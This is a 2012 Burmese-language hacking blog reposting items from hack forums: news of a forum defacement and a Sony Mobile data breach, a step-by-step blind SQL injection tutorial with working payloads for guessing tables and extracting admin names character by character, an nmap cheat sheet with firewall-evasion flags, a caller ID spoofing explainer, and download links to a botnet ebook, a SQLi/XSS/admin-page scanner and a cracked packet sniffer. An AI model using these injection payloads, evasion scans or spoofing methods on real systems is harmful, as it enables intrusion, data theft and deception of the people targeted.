Friday, November 2, 2012

Myanmar Hack Forum Has Been Hacked

ျမန္မာႏုိင္ငံ၏ ပထမဆံုးေသာ Hack Forums ျဖစ္သည့္ Myanmar Hackforums ကို အင္ဒိုနီးယား Hacker တစ္ဦးျဖစ္သည့္ cr4wl3r က ႏို၀င္ဘာ ၂ ရက္ေန႕က ေဖာက္ထြင္းသြားခဲ့သည္ ။ cr4wl3r သည္  Exploit မ်ား ထုတ္ေ၀ေပးေနသည့္ 1nj3ct0r အဖြဲ႕၀င္တစ္ဦး ျဖစ္သည္ ။
Cr4wl3r ၏ twitter account မွာ http://twitter.com/hackb0x ျဖစ္ျပီး Mail မွာ cr4wl3r@linuxmail.com ျဖစ္သည္ ။.
Cr4wl3r ေဖာက္ထြင္းခဲ့ေသာ Website မ်ားစာရင္းႏွင့္ Deface Mirror မ်ားကို http://www.zone-h.org/archive/notifier=cr4wl3r တြင္ ေတြ႕ရွိႏိုင္ျပီး exploit-db.com ႏွင့္ သူ၏ Exploit မ်ားကို  http://sh3ll4u.blogspot.de/ တြင္ ေတြ႕ရွိႏိုင္သည္။ ။

copy from ghostarea.net
Read More ->>

Wednesday, October 24, 2012

Botnets The Killer Web Applications(Ebook)



ပို႕ေတြမတင္ျဖစ္တာလဲၾကာျပီ...သင္တန္းလဲမအားတာနဲ႕ပဲ....ခုေတာ့ဖတ္ခ်င္တဲ့တဲ့ သူငယ္ခ်င္းေတြ အတြက္ စာအုပ္ေလး ရွဲေပးလိုက္ တယ္...  soe soe diary ကရတာ ....။လြယ္တယ္ေနာ္..ဟီး ...သူ႕ကိုလဲ ေက်းဇူးတင္ပါတယ္...။
လိုခ်င္ရင္ေအာက္ကေန ေဒါင္းလိုက္ပါ...။

http://www.ziddu.com/download/20697736/Botnets_The_Killer_Web_Applications.rar.html
http://minus.com/l9B2KTM2Woyao


Read More ->>

Thursday, September 13, 2012

Blind Sql Inj3cti0n Yummy Guide

Posted Image


၀ … ပထမဆုံးေျပာခ်င္တာက … Blind ကသိပ္အခ်ိန္ကုန္လုိ. ၀ တုိ. … အေနနဲ. Tool သုံးမယ္ဆုိရင္ဘာမွေ၀ဖန္စရာမရိွပါဘူး…. သုံးခ်င္တာသုံးၾကပါ … ဟဲဟဲ…
ဒါပင္မယ့္လည္း … ဘယ္လုိဘယ္လုိ … လုပ္သလဲဆုိတဲ့နည္းေလးတိထားရင္ေကာ မေကာင္းဘူးလား… ??
ဒါေၾကာင့္ဒီဟာကုိေရးတာပါ…
Blind ကိုဘာလုိ.သံုးရသလဲဆုိေတာ့ … DB ထဲမွာ “information_schema” ဆုိတဲ့ Table ေလးမရိွတာေၾကာင့္ Union ေတြဘာေတြနဲ. Data ကုိထုတ္လုိ.မရဘူး … (version ေအာက္ေနလုိ.ေပါ့)

[+]Blind ၂မ်ိဳးရွိပါတယ္ …
၁.Boolean Based (normal blind)
2.Time Based (time delay)
အဲကလုိေပါ့ …

[1]Boolean
ဥပမာ … ၀တုိ.မွာ … ေဟာဒီ error ျဖစ္ေနတဲ့ ဆုိဒ္ေလးရွိတယ္… ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13

#သူ.ကို single quote ( ‘ ) ေလးနဲ.စမ္းျပီး… ေနာက္ဆုံး version ေအာက္ေနေတာ့ ေရွ.ဆက္လုိ.မရဘူးဆုိပါေတာ့

#တခ်ိဳ.ဆုိဒ္ေတြက … single-quote(‘) နဲ.စမ္းမရဘူး … ဒါဆုိ Boolean Logic (True or False)ကုိသုံးပါမယ္ … Boolean ကေတာ့ အလယ္ရာစုက…သခၤ်ာပညာရွင္ၾကီးပါ … Programmer ကုိကုိေတြ ေကာင္းေကာင္းသိၾကပါတယ္…
အဲဒီေတာ့ ေစာေစာကဆုိက္ရဲ. Variable ေနာက္မွာ
and 1=1
ဆုိျပီးထည့္ကာစမ္းလုိက္ပါမယ္…
www.နတ္ဆုိး.net/index.php?catid=13 and 1=1
webpage ကပုံမွန္ပဲတက္လာတယ္ … no error
ဘာလုိ.ဆုိေတာ့ … တစ္က တစ္နဲ.ညီတယ္ဆုိတာ ကေလးေတာင္တိတယ္…ေလ… ဘာလို.error ျပရမွာလဲဟုတ္စ…
ဒီတစ္ခါ
and 1=2

ဒါဆုိရင္ link က

www.နတ္ဆုိး.net/index.php?catid=13 and 1=2

webpage ကုိသတိထားၾကည့္ပါ…. ပုံတစ္ခ်ိဳ. … စာတစ္ခ်ဳိ.ေျပာက္ေနျပီဆုိိ… error ေပါက္ေနပါျပီ…
1=2 ပဲစမ္းရမယ္လုိ. ပုံေသမရိွပါဘူး… logic အရမွားေနတာေတြၾကိဳက္တာစမ္းလုိ.ရတယ္…. ဥပမာ…
www.နတ္ဆုိး.net/index.php?catid=13 100000000001-100000000001=0
www.နတ္ဆုိး.net/index.php?catid=13 100000000001-100000000001=2
အဲလုိမ်ိဳးလဲရေသးတယ္…

#Version
and substring(@@version,1,1)=VERSION
version ဆိုတဲ့ေနရာေလးမွာ 4 တစ္ခါ 5 တစ္ခါထည့္ပါမယ္…
ဒီေတာ့ျဖစ္လာမယ့္ ပုံစံေလးက…

www.နတ္ဆုိး.net/index.php?catid=13 and substring(@@version,1,1)=4
page မွန္မွန္ကန္ကန္တက္တဲ့ဟာက … အဲဒီ့ version ေပါ့ … ဟုတ္ဖူူးလား…

#TableName
 and (SELECT 1 from TABLENAME limit 0,1)=1

table-name ဆုိတဲ့ေနရာမွာ … ကုိယ္ခန္.မွန္းလုိ. ရသေလာက္ tblname ေတြခန္.မွန္းျပီးထည့္ပါ…
ဒီေတာ့ျဖစ္လာမယ့္ပုံစံက…

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT 1 from မရွိတဲ့tablename limit 0,1)=1

ဒါဆုိ. … tablename ကတကယ္မရွိတာေၾကာင့္ page က error ေတြနဲ.တက္လာပါတယ္… ဒါဆုိဆက္ျပီးစမ္းပါ …
users ဆုိတဲ့ table တစ္ခုခ်ိတယ္.... ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT 1 from users limit 0,1)=1

users ဆုိတဲ့ Table ရွွိတာေၾကာင့္ page ကပုံမွန္တက္လာပါျပီ … notepad မွာ ကုိုယ္သိျပီးတဲ့ tablename ကုိ ခဏမွတ္ထားပါ….

#Columns

and (SELECT substring(concat(1,ColumnName),1,1) from TableName limit 0,1)=1

TableName = ေစာေစာက ကုိယ္သိျပီးတဲ့ tblname
ColumnName = အခုကုိယ္မွန္းထည့္ရမယ့္ colname

ဒါဆုိ ပုံစံက …

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT substring(concat(1,မရွိတဲ့Columnname),1,1) from users limit 0,1)=1

page ပုံမွန္မတက္ပါ… ဘာလုိ.ဆုိေတာ့ … column name တကယ္ မရွိတာေၾကာင့္ပါ…
admin ဆုိတဲ့ ... column ရွိတယ္ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT substring(concat(1,admin),1,1) from users limit 0,1)=1

page ပုံမွန္တက္လာျပီ… ဒါဆုိ admin ဆိုတဲ့ column ရိွလုိ.ေပါ့

#Getting Data
အခု data ထုတ္ဖုိ. … ေအာက္က query ကုိသုံးမယ္…
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

COLUMN = ေစာေစာကကုိယ္သိခဲ့တဲ့ admin column
TABLE = ေစာေစာကကုိယ္သိခဲ့တဲ့ table name

www.asciitable.com ကုိေသာ္လည္းေကာင္း … hackbar က text-hex ကုိေသာ္လည္းေကာင္း http://easycalculation.com/ascii-hex.php ကုိေသာ္လည္းေကာင္းသြားပါ

ASCII VALUE HERE= ဆိုတဲ့ေနရာမွာ … data ရဲ. Ascii value ေတြကုိမွန္းထည့္မွာပါ
ပုံမွန္ site ေတြမွာ username ကုိ special Character ေတြ ...ေပးမထည့္ပါ ... ဒါေၾကာင့္ special character တစ္ခုျဖစ္တဲ့ @ နဲ. စျပီးစစ္ပါမယ္
@ ရဲ. Ascii value က 64 ပါ … ဒါေၾကာင့္အခုလုိ …
and ascii(substring((SELECT concat(admin) from users WHERE id=1),1,1))>64

page မွန္မွန္ကန္ကန္မတက္ဘူး… ဒါဆုိ… username က @ နဲ.မစတာေသခ်ာသြားျပီ … 64 ကုိဆက္တိုးျပီးမွန္းၾကည့္ပါတယ္….
ဆုိပါစုိ. Admin name က john လုိ.
J ရဲ. Ascii value က 106
ဒါေၾကာင့္ပုံစံက ….

and ascii(substring((SELECT concat(admin) from users WHERE id=1),1,1))>105

page မွန္မွန္ကန္ကန္တက္လာမယ္ … ဘာလုိ.ဆုိေတာ့ j ဆုိတဲ့ value ကတကယ္ရွိေနလုိ. Ascii value က 105 …
အဲဒီမွာ 106 လုိ.ေျပာင္းထည့္ၾကည့္လိုက္ရင္… error တက္လာမယ္ ဒါဆုိ. … 106ကို table မွာသြားဖတ္ရင္ … j လုိ.ေတြ.ရလိမ့္မယ္…
ခ်ဳံေျပာရရင္ … error မတက္မခ်င္းေရွ.တုိး… error တက္ရင္ရပ္ … ျပီးရင္ table မွာသြားဖတ္ေပါ့ ….

ပထမတစ္ေနရာျဖစ္တဲ့ 1,1 ကျပီးသြားျပီ…
ဒုတိယေနရာျဖစ္တဲ့ 2,1 ကုိေစာေစာကနည္းအတုိင္းစမ္းပါ… “O”ရရင္…
စုစုေပါင္း.. 2 လုံးရပါျပီ… “ j၀ “ ဒီနည္းအတုိင္း…. ဆက္ျပီးစမ္းၾကည့္ပါ…
ေတာ္ေတာ္ကုိ …အခ်ိန္ကုန္တဲ့ method မုိ. … ဦးဦး mhu@larm ေပးထားတဲ့
List of Table & columns ေတြကုိ … copy paste လုပ္ျပီး… Havij လုိ tool မ်ိဳးမွာ … ထပ္ေပါင္းထည့္ေပးလုိက္ရင္တူူတုိ.က …. AUTO လုပ္ေပးမွာေပါ့… ဟုတ္ဖူးလား….

[2]Time delay ကုိေရးခ်င္ေတာ့ဖူး…. ဘာလုိ.ဆုိေတာ့ … ကိုယ္ႏိုင္ငံ connection ကသိတဲ့အတုိင္းပဲ … အဲဒီ့နည္းက … page loading လုပ္မယ့္အခ်ိန္ကုိ … ကန္.သတ္လုိက္ျပီး… error ေပါက္မေပါက္စစ္တာ …
ဒီမွာစစ္ေနရင္ေတာ့ … ၁နာရီၾကာမွ တစ္ခါတက္တဲ့ loading ဆုိေတာ့ …. ဟူး……
G00Gle မွာအမ်ားၾကီးပါ… ရွာၾကည့္ၾကည့္ေပါ့… မေတြ.ရင္လည္းေျပာေပ့ါ ….

ဒီနည္းေတြပဲလားဆုိေတာ့ ... ဟုတ္ပါဖူး... တျခားနည္းေတြလည္းရွိေသးတာေပါ့
Error Based နဲ.လည္း... ထုိးလုိ.ရပါေသးတယ္...

copy from http://mmhackforums.com//index.php?/topic/814-blind-sql-inj3cti0n-yummy-guide/
Read More ->>

Sunday, September 9, 2012

www.mmcybersecurityteam.net is hacked



http://www.mmcybersecurityteam.net

own by IT^J0k3r
Read More ->>

Tuesday, September 4, 2012

RAR and Zip Pass Cracker Tools

Read More ->>

Nmap Kung-Fu {Basic Scanning technique}


Nmap ဆိုတာနဲ ့ pentest သမားေတြေကာ ဟက္ကာၾကီးေတြေကာ လက္စြဲထားရတာ ၾကားဖူးၾကမယ္ထင္ပါတယ္ ... host / server / system တစ္ခု စေဖာက္ဖို ့ဆို အရင္ဆံုး/ပထမဆံုး step အၿဖစ္ nmap ကအဓိကေနရာက ပါဝင္လုပ္ေဆာင္ပါတယ္ ... window သမားေတြအတြက္လည္းရွိပါတယ္.. ဒါေပမယ့္ window မွာသံုးရတာေတာ့ တမ်ိဳးပဲဗ် က်ေနာ့္အထင္ ... Posted Image

nmap ဆိုတာဘာလဲ >>>
http://nmap.org/
window သမားေတြအတြက္ >>> http://nmap.org/book/inst-windows.html
Nmap Online tool >>> http://nmap-online.com/ // မိုက္လယ္ဟ online ရွိပီးသား... ခုမွတိတယ္... ဟီး....

ေအာက္မွာ nmap ရဲ ့ basic scanning techniques ေလးေတြကိုေတြ ့ရမွာပါ ... အေတာ္အသံုးဝင္ပါတယ္ ... ခုေလာေလာဆယ္ လိုတယ္လို ့ေမာင္ဒုတ္ မေၿပာပါဖူး ... ေနာင္တစ္ခ်ိန္ လိုကိုလိုလာပါလိမ့္မယ္.. အဲ့ခ်ိန္က်ရင္ ဒီပို ့စ္ေလးကို သတိရရင္ပဲ .. ပို ့တင္ရက်ိဳး နပ္ပါတယ္ .. Posted Image

Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1,target2,etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cdir]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] –exclude [targets]

Excluding targets using a list —> nmap [targets] –excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap –traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap –system-dns [target]

Manually specify DNS servers —> nmap –dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap –scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap –send-eth [target]

Send IP packets —-> nmap –send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p “*” [target]

Scan top ports —–> nmap –top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —-> www.nmap.org/submit/

Attempt to guess an unknown —-> nmap -O –osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV –version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap –ttl [time] [target]

Minimum of parallel connections —-> nmap –min-parallelism [number] [target]

Maximum of parallel connection —-> nmap –max-parallelism [number] [target]

Minimum host group size —–> nmap –min-hostgroup [number] [targets]

Maximum host group size —-> nmap –max-hostgroup [number] [targets]

Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]

Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]

Maximum retries —-> nmap –max-retries [number] [target]

Host timeout —-> nmap –host-timeout [time] [target]

Minimum Scan delay —-> nmap –scan-delay [time] [target]

Maximum scan delay —-> nmap –max-scan-delay [time] [target]

Minimum packet rate —-> nmap –min-rate [number] [target]

Maximum packet rate —-> nmap –max-rate [number] [target]

Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap –mtu [MTU] [target]

Use a decoy —-> nmap -D RND: [number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap –source-port [port] [target]

Append random data —-> nmap –data-length [size] [target]

Randomize target scan order —-> nmap –randomize-hosts [target]

Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap –badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap –stats-every [time] [target]

133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap –reason [target]

Only display open ports —-> nmap –open [target]

Trace packets —> nmap –packet-trace [target]

Display host networking —> nmap –iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap –script [script.nse] [target]

Execute multiple scripts —-> nmap –script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap –script [category] [target]

Execute multiple scripts categories —-> nmap –script [category1,category2, etc]

Troubleshoot scripts —-> nmap –script [script] –script-trace [target]

Update the script database —-> nmap –script-updatedb

Ndiff

Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]


./preview

 
credit:http://pentestlab.wordpress.com/
copy from MHU
Read More ->>

Monday, September 3, 2012

Caller ID spoofing



ခုတေလာ cracking ေရာင္ေရာင္ hacking ေရာင္ေရာင္လုပ္ေနတာနဲ့ post ေတာင္မေရးျဖစ္ဘူးျဖစ္ေနတယ္။ ဘာေရးရမွန္းမသိတာလဲ ပါပါတယ္ :D ။ စိတ္ကူးေလးေပါက္တုန္း ဗဟုသုတ ဆိုျပီး Spoofing အေျကာင္းေလးတစ္ခ်က္ ေျပာျကည့္ရေအာင္။ သိတဲ့ အတိုင္းပဲ က်ြန္ေတာ္က mobile hacking အေျကာင္းတာဝန္ယူထားတယ္ဆိုေတာ့ Caller ID spoofing ေရးထားပါတယ္။ What is Spoofing ?? Spoofing ဆိုတာကေတာ့ hackers ေတြရဲ့ technique တစ္မ်ိုးေပါ့။ အခ်က္အလက္တစ္ခုကို သိခ်င္တဲ့ အခါမ်ိုးတို့ ဒါမွမဟုတ္ ကိုယ့္ကို မသိေစခ်င္တဲ့အခါမ်ိုးတို့မွာသံုးပါတယ္။ အဲ့ spoof ရဲ့ အဓိပဿပါယ္ ေလးက အေျကာင္းအရာတစ္စံုတစ္ကိုဟာသ အျမင္နဲ့ တုတာကို ေျပာတာပါ။ What is Caller ID spoofing?? Caller ID spoofing ဆိုတာက ဖုန္းေခါ္ခံရမယ့္လူဘက္က ေပါ္မဲ့ Caller ID ကို လာေနက် station ကမဟုတ္ပဲ တစ္ျခား number အေနနဲ့ေဖာ္ ျပနိုင္တဲ့ telephone network ရဲ့ ျဖစ္ေပါ္လာတဲ့ အေလ့အက်င့္တစ္ခုေပါ့။ ဥပမာ ျမန္မာနိုင္ငံက သူငယ္ခ်င္းတစ္ေယာက္ ကို ကိုယ္က ဒီနုိင္ငံက နံပါတ္မဟုတ္ပဲ တစ္ျခားနံပါတ္ျဖစ္ေအာင္ဖန္တီးျပီး ကိုယ္ဖုန္းနဲ့ ေခါ္တာမ်ိုးေပါ့။တစ္ဖက္လူကို မိမိ အေျကာင္း trace လိုက္လို့ မရေအာင္ လုပ္တဲ့ ပံုစံမ်ိုးျဖစ္ပါတယ္။ email spoofing လိုပဲ ဘယ္က ပို့မွန္းမသိေအာင္ ေနတဲ့ email sender အေန သေဘာမ်ိုးနဲ့ ဆက္သြယ္ျခင္းျဖစ္ပါတယ္။ ဘယ္နံပါတ္မ်ိုးမဆို Caller ID spoofing က caller ေတြ အျကိုက္ဖန္တီးေပးနုိင္ပါတယ္။ Process of Providers ရုိးရွင္းတဲ့ spoofing service တစ္ခုရဲ့ process ကို ေျပာပါ့မယ္ ။ customer တစ္ေယာက္က call spoofing company တစ္ခုမွာ Personal identification number (PIN) တစ္ခုကို ဝယ္လိုက္တယ္ အဲ့ PIN က ခု prepaid ေတြလိုေပါ့ call time အတိအက်ပါတယ္။ ဘယ္နွနာရီေျပာနုိင္မယ္ေပါ့ေလ။ အဲဒါနဲ့ customer က ေပးထားတဲ့ Company က ေပးတဲ့ number ကို dial လုပ္ သူရထားတဲ့ PIN ကို နွိပ္မယ္။ျပီးေတာ့ customer က ေခါ္မယ့္ နံပါတ္ကို နွိပ္မယ္ျပီးရင္ Caller ID ကို ေျပာင္းခ်င္တဲ့ နံပါတ္ေျပာင္းမယ္။ ဒါက User or customer ဘက္က လုပ္တာ။ အဲ့ customer နွိပ္ျပီးတာနဲ့ တျပိုင္နက္ call က ဟို receive လုပ္မယ္လူဆီကို company က လြွဲေပးလိုက္ျပီ။ အဲ့မွာ တင္ receive လုပ္တဲ့့လူဘက္မွာ ဘယ္က မွန္းမသိေသာ Caller ID ေပါ္လာျပီေပါ့။ Web-based spoofing service ေတြက provider ေတြနဲ့ အေကာင့္ေတြလုပ္။ customer ေတြကို သူတို့ website မွာ login ဝင္ျပီးရင္ form ကို ျပည့္စံုေအာင္ျဖည့္။အမ်ားစု company ေတြ ေတာင္းတဲ့ အခ်က္ေတြက ၁.source number ၂.destination number ၃.caller ID number ေတြပါပဲ။ ဥပမာအေနနဲ့ http://www.teleturd.com/ မွာသြားျကည့္လို့ရပါတယ္။တစ္ခ်ို့ company ေတြဆို အသံေျပာင္းလို့ရေအာင္ေတာင္ ထည့္ေပးပါေသးတယ္။ Caller ID spoofing ေတြကို ဘယ္လိုင္းေတြမွာ သံုးတာမ်ားလဲဆိုရင္ Voice Over Internet Protocol( VoIP)နဲ့ Primary Rate Interface(PRI)တို့မွာသံုးတာမ်ားပါတယ္။ ေနာက္ထပ္ spoofing method ေတြရွိပါေသးတယ္။ orange boxing တို့ဘာတို့ ေပါ့။ဟိုတစ္ေခါက္က က်ြန္ေတာ္ red boxing ေရးခဲ့ဖူးတယ္မလား။ ခု orange boxing ကသူ့အဆက္ :D ။ က်ြန္ေတာ္ တစ္ေခါက္ေရးေပးခဲ့တယ့္ spoofapp ဆိုတဲ့ android apk က လဲ caller id spoofing ပါပဲ။အဲ့ app ကေတာ့ US နဲ့ Canada မွာ ပဲ ရတယ္လို့ေျပာပါတယ္။ ခုေနာက္ပိုင္း spoofing နဲ့ပတ္သတ္တဲ့ apk ေတြအမ်ားျကီးထြက္လာပါေသးတယ္။ေနာက္ဆံုး က်ြန္ေတာ္သူငယ္ခ်င္းေပးတဲ့ msg spoof apk ကေတာ့ txtmyanmar.apk ပါ။အခါသင့္ အခြင့္သာရင္ orange boxing အေျကာင္းထပ္ေရးပါမယ္လို့ ကတိေပးရင္း ဒီေလာက္နဲ့ေက်နပ္မယ္လို့ထင္ပါတယ္ :D ။ စာဖတ္ပရိတ္သတ္အေပါင္း ကိုယ္ေရာစိတ္ပါက်န္းမာခ်မ္းသာပါေစ။ ဒါက ဗဟုသုတ အေနနဲ့ ေရးတာ ပါ ။ဒီနည္းေတြက Social engineering ေကာင္းရင္ ေကာင္းသေလာက္ အသံုးဝင္ပါတယ္။ထို့ေျကာင့္ ေနာက္တစ္ခုဆုေတာင္းတာက လူအခ်င္းခ်င္း လွည့္ပတ္ျခင္း ကင္းရွင္းျကပါေစလို့ :)

copy from ghostarea.net
Read More ->>

Sunday, September 2, 2012

Sony Mobile website hacked by NullCrew


ယခုႏွစ္အတြင္း ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ Sony Mobile website သည္ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ တိုက္ ခိုက္ခံခဲ့ရပါတယ္...။ www.sonymobile.com သည္ Hacker Group တစ္ခုျဖစ္ေသာ Null Crew အဖြဲ႕ မွတိုက္ ခိုက္ခ်င္ကိုခံခဲ့ရျပီး user အမ်ားစုရဲ႕ အခ်က္အလက္မ်ားကို ဖြင့္ခ်ေဖာ္ထုတ္ ခဲ့ပါတယ္...။ဒီသတင္းအခ်က္ အလက္ကိုလဲ တိုက္ခိုက္သူမ်ားျဖစ္တဲ့ Null Crew ရဲ႕ twitter account ထဲမွာေဖာ္ျပခဲ့ျခင္းျဖစ္ပါတယ္...။

သူတို႕ဟာ ထြင္းေဖါက္ ရယူထားေသာသတင္းအခ်က္ အလက္ အစုအစည္းမ်ားကို Pastebin တြင္လဲ ေဖာ္ျပ ထားျပီး ေအာက္ပါ  သတိေပးစာကို ေဖာ္ျပခဲ့ပါတယ္....။

Stats of Dumps

  • 441 ေယာက္ေသာ အသံုးျပဳသူမ်ား၏ username မ်ား email အေကာင့္မ်ား×××××
  • Think_users Table မွ 24 ေယာက္ေသာ user မ်ား၏ Hash passwords မ်ားပါသြားျခင္း××××
  • admin_users Table မွ 3 ေယာက္ေသာ Admin မ်ား၏ အခ်က္အလက္မ်ားပါ၀င္သြားျခင္း×××××

တို႕ပဲျဖစ္ၾကပါတယ္...။

ref: http://thehackernews.com
post by shwekoyantaw
Read More ->>

[Tool]MaxISploit SQLi , XSS , Admin login and shared hosting scanner[/Tool]



HF ကရတာေနာက္ေတာ့ မွ အသံုးျပဳပံု tuto ေရးေပးမယ္...။မအားေသးလို႕ပါ...။

လိုခ်င္ရင္ေအာက္ပါလင့္ကေနယူႏိုင္ပါတယ္...။

http://code.google.com/p/maxisploit-scanner/

http://www.ziddu.com/download/20256523/MaxISploit.rar.html 

သူ႕ Function ေတြကေတာ့ေအာက္ပါအတိုင္းျဖစ္ပါတယ္...။

1.SQL injection :
a)Error based: it scans for vulnerable websites based on common SQL errors for variety of databases.
b)Difference (true/false) scan: it scans for sites that do not display SQL errors but yet are vulnerable , the concept behind this scan is true / false query to the database which will give different answers which will then be scanned and in case of difference in length and content site will be considered vulnerable.
2.XSS scanner : it encrypts XSS vector and tries to scan result from web server , if XSS vector is found inside source than site is vulnerable. It only uses GET request to web server. NOTE: It will scan for XSS vector but it will not test if alert or any other event really happened.
3.Admin scanner : it scans for admin login locations , based on default list or any other that you have supplied.Response code 200 and 306 is considered success.
4.Shared hosting scanner : it send request to sameip.org and then parses html for pages

shweko
Read More ->>

Saturday, September 1, 2012

How to get IPs on Steam (Multiple Packet Sniffers+CommView Crack)


HF ကရတဲ့ စာအုပ္ေလးပါ...။ေတာ္ေတာ္ေကာင္းတယ္ ...။ေရးထားတာရွင္းလင္းတယ္...။အသံုး၀င္မယ္ လို႕ထင္ပါတယ္...။အစကဘာသာျပန္မလို႕ပဲ မအားတာနဲ႕ ဒီအတိုင္းေလးပဲတင္ေပးလိုက္တာ...။

http://www.mediafire.com/?xzf8uanzwkteudn
Read More ->>

Gtalk မွာ Group ဖြဲ႕ၿပီး ေျပာဖို႕ Party Chat လုပ္ၾကရေအာင္

Posted Image

အုပ္စုဖြဲ႕ၿပီး Chat ၾကဖို႔အတြက္ကေတာ့ ပထမဦးဆံုး လုပ္ရမွာက http://partychapp.appspot.com/ ဆိုတဲ့ လိပ္စာေလးကို အရင္ဦးဆံုးသြားလိုက္ပါ။ အဲဒီ ဆိုဒ္ေလး ပြင့္လာၿပီဆိုတာနဲ႕ Sign in မွာ မိမိရဲ႕ Gmail account နဲ႔ ပဲ၀င္လိုက္ပါ။ အဲဒီေနာက္မွာေတာ့ ေအာက္မွာေပးးထားတဲ့ အတိုင္းလိုက္လုပ္လိုက္ပါေတာ့။
Posted Image


နံပါတ္တစ္လုပ္ရမွာက Room name လို႔ေပးထားတဲ့ ေနရာေလးမွာ မိမိစိတ္ႀကိဳက္ နာမည္ေလးတစ္ခုဖန္တီးပါ။ ဥပမာ name@partychatapp.app spotchat.com ဆိုၿပီးေတာ့ေပါ့။ ၿပီးေတာ့ Room type မွာကေတာ့ ကိုယ္ႀကိဳက္ရာကို ေရြးခြင့္ရွိပါတယ္။ တစ္ခုသိထားရမွာက Invite only မွာက ကိုယ္တိုင္ဖိတ္ေခၚ ခ်င္တဲ့သူေပါ့။ မဖိတ္ေခၚပဲနဲ႔ ၀င္လာလို႔မရဘူးေပါ့ေလ။ Open ကေတာ့ ကိုယ္ဖိတ္စရာမလိုဘူး ကိုယ့္ရဲ႕လိပ္စာကို သိရင္ ၀င္လာလို႕ရတယ္။ အဲလိုမ်ဳိးေပါ့။ Others to invite မွာေတာ့ ကိုယ္စၿပီး ဖန္တီးတဲ့အခါ ကိုယ့္နာမည္ကို ထည့္ရိုက္ဖို႕လိုပါတယ္။ ကိုယ္ပိုင္အီးေမးလ္ကို ရိုက္ရမွာေပါ့ေလ။ ၿပီးေတာ့ Create ကို ကလစ္ႏွိပ္လိုက္ရင္ ေအာက္မွာ ေဖာ္ျပထားတဲ့ ပံုေလးေပၚလာလိမ္မယ္။
Posted Image

ၿပီးသြားတဲ့အခ်ိန္မွာေတာ့ သင့္ရဲ႕ Gtalk ထဲမွာ အခုလိုမ်ဳိးလာေပၚေနပါလိမ့္မယ္။
Posted Image

